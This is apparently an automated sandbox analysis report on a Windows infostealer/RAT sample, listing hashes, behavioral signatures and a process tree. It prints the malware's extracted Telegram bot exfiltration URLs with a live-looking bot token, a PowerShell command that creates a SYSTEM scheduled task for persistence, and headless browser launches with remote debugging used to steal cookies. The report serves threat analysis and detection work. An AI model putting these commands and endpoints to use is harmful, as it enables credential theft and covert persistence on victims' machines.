Analysis
-
max time kernel
133s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 10:51
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe
-
Size
5.7MB
-
MD5
7cbfcf1b8eb95b00a52c8545858247f4
-
SHA1
144a1e5ef70cc427c9eab0bdbe750029a8b1f311
-
SHA256
6a285a9511a2eea7d847566cfc5b5e2b79d1b8f173d134da7f90f8b6017d2f5d
-
SHA512
b6cb800865689d30ef598d3fc4f21fd838557448dc1b295a8cbdd1282c9b78e4ca120b4f8d27e6ca0194c6ec8c9255c565150e880834f2f9a8dc3001a24d4f68
-
SSDEEP
98304:Qf7l27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Ucze:QiOuK6mn9NzgMoYkSIvUcwti7TQlvcid
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendDocument?chat_id=7848641603&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(2.83%20kb
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendMessage?chat_id=7848641603
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/getUpdates?offset=-
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendDocument?chat_id=7848641603&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2980 chrome.exe 3812 chrome.exe 3948 msedge.exe 5112 msedge.exe 3092 chrome.exe 2320 chrome.exe 1132 chrome.exe 4224 chrome.exe 2536 msedge.exe 5784 msedge.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe -
Executes dropped EXE 1 IoCs
pid Process 4740 Update.exe -
Loads dropped DLL 2 IoCs
pid Process 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 4740 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 4904 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 raw.githubusercontent.com 11 raw.githubusercontent.com 30 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1696 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6000 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881511251176108" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe 4904 powershell.exe 4904 powershell.exe 4740 Update.exe 3092 chrome.exe 3092 chrome.exe 4740 Update.exe 4740 Update.exe 4740 Update.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3092 chrome.exe 3092 chrome.exe 3092 chrome.exe 3092 chrome.exe 3092 chrome.exe 3948 msedge.exe 3948 msedge.exe 3948 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe Token: SeDebugPrivilege 1696 tasklist.exe Token: SeDebugPrivilege 4740 Update.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe Token: 34 4904 powershell.exe Token: 35 4904 powershell.exe Token: 36 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe Token: 34 4904 powershell.exe Token: 35 4904 powershell.exe Token: 36 4904 powershell.exe Token: SeIncreaseQuotaPrivilege 4904 powershell.exe Token: SeSecurityPrivilege 4904 powershell.exe Token: SeTakeOwnershipPrivilege 4904 powershell.exe Token: SeLoadDriverPrivilege 4904 powershell.exe Token: SeSystemProfilePrivilege 4904 powershell.exe Token: SeSystemtimePrivilege 4904 powershell.exe Token: SeProfSingleProcessPrivilege 4904 powershell.exe Token: SeIncBasePriorityPrivilege 4904 powershell.exe Token: SeCreatePagefilePrivilege 4904 powershell.exe Token: SeBackupPrivilege 4904 powershell.exe Token: SeRestorePrivilege 4904 powershell.exe Token: SeShutdownPrivilege 4904 powershell.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeSystemEnvironmentPrivilege 4904 powershell.exe Token: SeRemoteShutdownPrivilege 4904 powershell.exe Token: SeUndockPrivilege 4904 powershell.exe Token: SeManageVolumePrivilege 4904 powershell.exe Token: 33 4904 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3092 chrome.exe 3948 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4740 Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 5312 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 94 PID 3012 wrote to memory of 5312 3012 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 94 PID 5312 wrote to memory of 4692 5312 cmd.exe 96 PID 5312 wrote to memory of 4692 5312 cmd.exe 96 PID 5312 wrote to memory of 1696 5312 cmd.exe 97 PID 5312 wrote to memory of 1696 5312 cmd.exe 97 PID 5312 wrote to memory of 1724 5312 cmd.exe 98 PID 5312 wrote to memory of 1724 5312 cmd.exe 98 PID 5312 wrote to memory of 6000 5312 cmd.exe 99 PID 5312 wrote to memory of 6000 5312 cmd.exe 99 PID 5312 wrote to memory of 4740 5312 cmd.exe 100 PID 5312 wrote to memory of 4740 5312 cmd.exe 100 PID 4740 wrote to memory of 4904 4740 Update.exe 102 PID 4740 wrote to memory of 4904 4740 Update.exe 102 PID 4740 wrote to memory of 3092 4740 Update.exe 106 PID 4740 wrote to memory of 3092 4740 Update.exe 106 PID 3092 wrote to memory of 1156 3092 chrome.exe 107 PID 3092 wrote to memory of 1156 3092 chrome.exe 107 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5104 3092 chrome.exe 108 PID 3092 wrote to memory of 5464 3092 chrome.exe 109 PID 3092 wrote to memory of 5464 3092 chrome.exe 109 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110 PID 3092 wrote to memory of 1816 3092 chrome.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7EC5.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7EC5.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:5312 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4692
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 3012"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:1724
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:6000
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $taskName = 'ChromeUpdate'; $exePath = 'C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe'; $action = New-ScheduledTaskAction -Execute $exePath; $trigger = New-ScheduledTaskTrigger -AtLogOn; $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; $task = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings; Register-ScheduledTask -TaskName $taskName -InputObject $task -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa806fdcf8,0x7ffa806fdd04,0x7ffa806fdd105⤵PID:1156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1948,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1940 /prefetch:25⤵PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2228,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:35⤵PID:5464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2252,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1804 /prefetch:85⤵PID:1816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3192 /prefetch:15⤵
- Uses browser remote debugging
PID:2980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:15⤵
- Uses browser remote debugging
PID:2320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4180,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4188 /prefetch:25⤵
- Uses browser remote debugging
PID:3812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4592 /prefetch:15⤵
- Uses browser remote debugging
PID:1132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5276,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5188 /prefetch:85⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5424,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:85⤵PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5300,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:85⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5708,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5704 /prefetch:85⤵PID:1136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5364,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5352 /prefetch:85⤵PID:6080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5308,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5724 /prefetch:85⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5656,i,17412527820085796758,7510150501885859573,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5456 /prefetch:15⤵
- Uses browser remote debugging
PID:4224
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x248,0x24c,0x250,0x244,0x26c,0x7ffa7db2f208,0x7ffa7db2f214,0x7ffa7db2f2205⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2276,i,15104328723932887715,17636052688980897981,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:35⤵PID:3600
-
-
